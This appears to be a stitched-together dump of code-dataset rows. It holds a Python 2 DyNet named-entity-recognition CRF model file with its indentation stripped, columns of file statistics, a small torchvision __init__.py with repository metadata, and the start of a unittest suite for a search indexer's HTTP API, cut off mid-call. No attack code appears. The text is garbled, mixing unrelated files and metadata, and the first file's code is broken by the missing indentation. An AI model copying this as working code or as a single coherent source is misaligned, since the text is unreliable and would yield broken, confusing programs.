concat_inputs = [dy.concatenate([c, w]) for c, w in zip(char_embs, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
return birnn_outputs
class CNN_BiRNN_CRF_model(CRF_Model):
''' Concatenate the CNN and BiRNN character representations to form the character vector. '''
def __init__(self, args, data_loader):
self.model = dy.Model()
self.args = args
super(CNN_BiRNN_CRF_model, self).__init__(args, data_loader)
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.char_hidden_dim * 2 + args.map_dim + args.cnn_filter_size
else:
birnn_input_dim = args.char_hidden_dim * 2 + args.word_emb_dim + args.cnn_filter_size
hidden_dim = args.hidden_dim
char_hidden_dim = args.char_hidden_dim
src_ctx_dim = args.hidden_dim * 2
cnn_filter_size = args.cnn_filter_size
cnn_win_size = args.cnn_win_size
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# within a batch all input sequences have the same length, so we don't have to bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
birnn_input_dim += bc_dim
self.char_cnn_encoder = CNN_Encoder(self.model, char_emb_dim, cnn_win_size, cnn_filter_size,
0.0, char_vocab_size, data_loader.char_padding_token)
self.char_birnn_encoder = BiRNN_Encoder(self.model,
char_emb_dim,
char_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=0.0,
vocab_size=0,
emb_size=char_emb_dim,
vocab_emb=self.char_cnn_encoder.lookup_emb)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
self.birnn_encoder = BiRNN_Encoder(self.model,
birnn_input_dim,
hidden_dim,
emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs_birnn = self.char_birnn_encoder.encode(char_sents, training=training, char=True)
char_embs_cnn = self.char_cnn_encoder.encode(char_sents, training=training, char=True)
word_embs = self.word_lookup.encode(sents)
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
if self.args.use_brown_cluster:
bc_feat_embs = self.bc_encoder.encode(bc_feats)
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([cr, cc, w, f, b]) for cr, cc, w, f, b in
zip(char_embs_birnn, char_embs_cnn, word_embs, feat_embs, bc_feat_embs)]
elif self.args.use_brown_cluster and not self.args.use_discrete_features:
concat_inputs = [dy.concatenate([cr, cc, w, f]) for cr, cc, w, f in
zip(char_embs_birnn, char_embs_cnn, word_embs, bc_feat_embs)]
elif self.args.use_discrete_features and not self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([cr, cc, w, f]) for cr, cc, w, f in
zip(char_embs_birnn, char_embs_cnn, word_embs, feat_embs)]
else:
concat_inputs = [dy.concatenate([cr, cc, w]) for cr, cc, w in zip(char_embs_birnn, char_embs_cnn, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
return birnn_outputs
class Sep_Encoder_CRF_model(CRF_Model):
''' Difference from CNN_BiRNN_CRF_model: use two BiLSTMs to model the embedding features (char and word) and the linguistic features separately. '''
def __init__(self, args, data_loader):
self.model = dy.Model()
self.args = args
super(Sep_Encoder_CRF_model, self).__init__(args, data_loader)
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.char_hidden_dim * 2 + args.map_dim + args.cnn_filter_size
else:
birnn_input_dim = args.char_hidden_dim * 2 + args.word_emb_dim + args.cnn_filter_size
hidden_dim = args.hidden_dim
char_hidden_dim = args.char_hidden_dim
src_ctx_dim = args.hidden_dim * 2
cnn_filter_size = args.cnn_filter_size
cnn_win_size = args.cnn_win_size
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
self.feature_birnn_input_dim = 0
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
self.feature_birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# within a batch all input sequences have the same length, so we don't have to bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
self.feature_birnn_input_dim += bc_dim
if self.feature_birnn_input_dim > 0:
self.feature_birnn = BiRNN_Encoder(self.model,
self.feature_birnn_input_dim,
args.feature_birnn_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
src_ctx_dim += args.feature_birnn_hidden_dim * 2
self.char_cnn_encoder = CNN_Encoder(self.model, char_emb_dim, cnn_win_size, cnn_filter_size,
0.0, char_vocab_size, data_loader.char_padding_token)
self.char_birnn_encoder = BiRNN_Encoder(self.model,
char_emb_dim,
char_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=0.0,
vocab_size=0,
emb_size=char_emb_dim,
vocab_emb=self.char_cnn_encoder.lookup_emb)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
self.birnn_encoder = BiRNN_Encoder(self.model,
birnn_input_dim,
hidden_dim,
emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs_birnn = self.char_birnn_encoder.encode(char_sents, training=training, char=True)
char_embs_cnn = self.char_cnn_encoder.encode(char_sents, training=training, char=True)
word_embs = self.word_lookup.encode(sents)
concat_inputs = [dy.concatenate([cr, cc, w]) for cr, cc, w in zip(char_embs_birnn, char_embs_cnn, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
if self.feature_birnn_input_dim > 0:
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
concat_inputs = feat_embs
if self.args.use_brown_cluster:
cluster_embs = self.bc_encoder.encode(bc_feats)
concat_inputs = cluster_embs
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([fe, ce]) for fe, ce in
zip(feat_embs, cluster_embs)]
fts_birnn_outputs = self.feature_birnn.encode(concat_inputs, training=training)
birnn_outputs = [dy.concatenate([eb, fb]) for eb, fb in zip(birnn_outputs, fts_birnn_outputs)]
return birnn_outputs
class Sep_CNN_Encoder_CRF_model(CRF_Model):
''' Difference from CNN_BiRNN_CRF_model: use two BiLSTMs to model the embedding features (char and word) and the linguistic features separately. '''
def __init__(self, args, data_loader):
self.model = dy.Model()
self.args = args
super(Sep_CNN_Encoder_CRF_model, self).__init__(args, data_loader)
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.map_dim + args.cnn_filter_size
else:
birnn_input_dim = args.word_emb_dim + args.cnn_filter_size
hidden_dim = args.hidden_dim
src_ctx_dim = args.hidden_dim * 2
cnn_filter_size = args.cnn_filter_size
cnn_win_size = args.cnn_win_size
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
self.feature_birnn_input_dim = 0
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
self.feature_birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# within a batch all input sequences have the same length, so we don't have to bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
self.feature_birnn_input_dim += bc_dim
if self.feature_birnn_input_dim > 0:
self.feature_birnn = BiRNN_Encoder(self.model,
self.feature_birnn_input_dim,
args.feature_birnn_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
src_ctx_dim += args.feature_birnn_hidden_dim * 2
self.char_cnn_encoder = CNN_Encoder(self.model, char_emb_dim, cnn_win_size, cnn_filter_size,
0.0, char_vocab_size, data_loader.char_padding_token)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
self.birnn_encoder = BiRNN_Encoder(self.model,
birnn_input_dim,
hidden_dim,
emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate,
vocab_size=0)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs_cnn = self.char_cnn_encoder.encode(char_sents, training=training, char=True)
word_embs = self.word_lookup.encode(sents)
concat_inputs = [dy.concatenate([cc, w]) for cc, w in zip(char_embs_cnn, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
if self.feature_birnn_input_dim > 0:
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
concat_inputs = feat_embs
if self.args.use_brown_cluster:
cluster_embs = self.bc_encoder.encode(bc_feats)
concat_inputs = cluster_embs
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([fe, ce]) for fe, ce in
zip(feat_embs, cluster_embs)]
fts_birnn_outputs = self.feature_birnn.encode(concat_inputs, training=training)
birnn_outputs = [dy.concatenate([eb, fb]) for eb, fb in zip(birnn_outputs, fts_birnn_outputs)]
return birnn_outputs
| 51.481061
| 149
| 0.627805
| 3,668
| 27,182
| 4.262541
| 0.049618
| 0.023025
| 0.017461
| 0.016374
| 0.927151
| 0.91826
| 0.913911
| 0.910841
| 0.906748
| 0.902143
| 0
| 0.003067
| 0.292289
| 27,182
| 527
| 150
| 51.578748
| 0.80969
| 0.042197
| 0
| 0.837438
| 0
| 0
| 0.01965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.004926
| null | null | 0.022167
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e98c1559713dae12d1344974fda8cbe9584339b1
| 41
|
py
|
Python
|
torchvision/edgeailite/__init__.py
|
TexasInstruments/vision
|
abaf29de0798e8e8d3f996dc272cd3c515562695
|
[
"BSD-3-Clause"
] | 21
|
2021-10-08T02:47:56.000Z
|
2022-03-29T14:17:04.000Z
|
torchvision/edgeailite/__init__.py
|
TexasInstruments/vision
|
abaf29de0798e8e8d3f996dc272cd3c515562695
|
[
"BSD-3-Clause"
] | 9
|
2021-11-15T06:43:54.000Z
|
2022-03-16T04:47:52.000Z
|
torchvision/edgeailite/__init__.py
|
TexasInstruments/vision
|
abaf29de0798e8e8d3f996dc272cd3c515562695
|
[
"BSD-3-Clause"
] | 9
|
2021-11-11T11:17:16.000Z
|
2022-03-08T04:26:10.000Z
|
from . import xnn
from . import xvision
| 10.25
| 21
| 0.731707
| 6
| 41
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 41
| 3
| 22
| 13.666667
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e9a6552f2365018bc814d63c24df199d427040e5
| 26,561
|
py
|
Python
|
tests/test_indexer_http.py
|
mosuka/basilisk
|
abe2de265af234bd78053ccc974ca4218a25cad3
|
[
"Apache-2.0"
] | 17
|
2018-10-19T02:36:41.000Z
|
2022-01-29T01:02:50.000Z
|
tests/test_indexer_http.py
|
mosuka/basilisk
|
abe2de265af234bd78053ccc974ca4218a25cad3
|
[
"Apache-2.0"
] | 23
|
2018-10-28T16:54:00.000Z
|
2019-02-15T17:09:25.000Z
|
tests/test_indexer_http.py
|
mosuka/basilisk
|
abe2de265af234bd78053ccc974ca4218a25cad3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2019 Minoru Osuka
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import unittest
import zipfile
from http import HTTPStatus
from logging import ERROR, Formatter, getLogger, INFO, NOTSET, StreamHandler
from tempfile import TemporaryDirectory
from time import sleep
import requests
import yaml
from prometheus_client.core import CollectorRegistry
from pysyncobj import SyncObjConf
from cockatrice import NAME
from cockatrice.indexer import Indexer
from tests import get_free_port
class TestIndexHTTPServicer(unittest.TestCase):
def setUp(self):
self.temp_dir = TemporaryDirectory()
self.example_dir = os.path.normpath(os.path.join(os.path.dirname(__file__), '../example'))
host = '0.0.0.0'
port = get_free_port()
seed_addr = None
conf = SyncObjConf(
fullDumpFile=self.temp_dir.name + '/index.zip',
logCompactionMinTime=300,
dynamicMembershipChange=True
)
data_dir = self.temp_dir.name + '/index'
grpc_port = get_free_port()
grpc_max_workers = 10
http_port = get_free_port()
logger = getLogger(NAME)
log_handler = StreamHandler()
logger.setLevel(ERROR)
log_handler.setLevel(INFO)
log_format = Formatter('%(asctime)s - %(levelname)s - %(pathname)s:%(lineno)d - %(message)s')
log_handler.setFormatter(log_format)
logger.addHandler(log_handler)
http_logger = getLogger(NAME + '_http')
http_log_handler = StreamHandler()
http_logger.setLevel(NOTSET)
http_log_handler.setLevel(INFO)
http_log_format = Formatter('%(message)s')
http_log_handler.setFormatter(http_log_format)
http_logger.addHandler(http_log_handler)
metrics_registry = CollectorRegistry()
self.indexer = Indexer(host=host, port=port, seed_addr=seed_addr, conf=conf, data_dir=data_dir,
grpc_port=grpc_port, grpc_max_workers=grpc_max_workers, http_port=http_port,
logger=logger, http_logger=http_logger, metrics_registry=metrics_registry)
self.host = host
self.port = http_port
def tearDown(self):
self.indexer.stop()
self.temp_dir.cleanup()
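# Hypothetical helper sketch (not in the original file): the create-index
# boilerplate repeated in the tests below could be factored out like this.
#   def _create_index(self):
#       with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as f:
#           body = f.read()
#       return requests.put(
#           'http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
#           data=body.encode('utf-8'), headers={'Content-Type': 'application/yaml'})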
def test_root(self):
# get
response = requests.get('http://{0}:{1}/'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_put_index(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
def test_get_index(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# get index
response = requests.get('http://{0}:{1}/indices/test_index'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_delete_index(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# get index
response = requests.get('http://{0}:{1}/indices/test_index'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# delete index
response = requests.delete('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get index
response = requests.get('http://{0}:{1}/indices/test_index'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
def test_put_document_yaml(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.yaml', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
def test_put_document_json(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.json', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/json'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
def test_get_document_yaml(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.yaml', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=yaml'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = yaml.safe_load(response.text)
self.assertEqual('1', data['fields']['id'])
def test_get_document_json(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.yaml', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('1', data['fields']['id'])
def test_delete_document(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read document 1
with open(self.example_dir + '/doc1.yaml', 'r', encoding='utf-8') as file_obj:
doc = file_obj.read()
# put document 1
response = requests.put('http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port),
data=doc.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('1', data['fields']['id'])
# delete document 1
response = requests.delete(
'http://{0}:{1}/indices/test_index/documents/1?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
def test_put_documents_json(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read documents
with open(self.example_dir + '/bulk_put.json', 'r', encoding='utf-8') as file_obj:
docs_json = file_obj.read()
# put documents
response = requests.put('http://{0}:{1}/indices/test_index/documents?sync=True'.format(self.host, self.port),
data=docs_json.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('1', data['fields']['id'])
# get document 2
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/2?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('2', data['fields']['id'])
# get document 3
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/3?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('3', data['fields']['id'])
# get document 4
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/4?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('4', data['fields']['id'])
# get document 5
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/5?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('5', data['fields']['id'])
def test_delete_documents_json(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read documents
with open(self.example_dir + '/bulk_put.json', 'r', encoding='utf-8') as file_obj:
docs_json = file_obj.read()
# put documents
response = requests.put('http://{0}:{1}/indices/test_index/documents?sync=True'.format(self.host, self.port),
data=docs_json.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('1', data['fields']['id'])
# get document 2
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/2?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('2', data['fields']['id'])
# get document 3
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/3?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('3', data['fields']['id'])
# get document 4
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/4?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('4', data['fields']['id'])
# get document 5
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/5?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual('5', data['fields']['id'])
# read documents
with open(self.example_dir + '/bulk_delete.json', 'r', encoding='utf-8') as file_obj:
doc_ids_json = file_obj.read()
# delete documents
response = requests.delete('http://{0}:{1}/indices/test_index/documents?sync=True'.format(self.host, self.port),
                                   data=doc_ids_json.encode('utf-8'), headers={'Content-Type': 'application/json'})
self.assertEqual(HTTPStatus.OK, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# get document 1
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/1?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# get document 2
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/2?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# get document 3
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/3?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# get document 4
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/4?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# get document 5
response = requests.get(
'http://{0}:{1}/indices/test_index/documents/5?output=json'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
def test_search_documents_json(self):
# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read documents
with open(self.example_dir + '/bulk_put.json', 'r', encoding='utf-8') as file_obj:
docs_json = file_obj.read()
# put documents
response = requests.put('http://{0}:{1}/indices/test_index/documents?sync=True'.format(self.host, self.port),
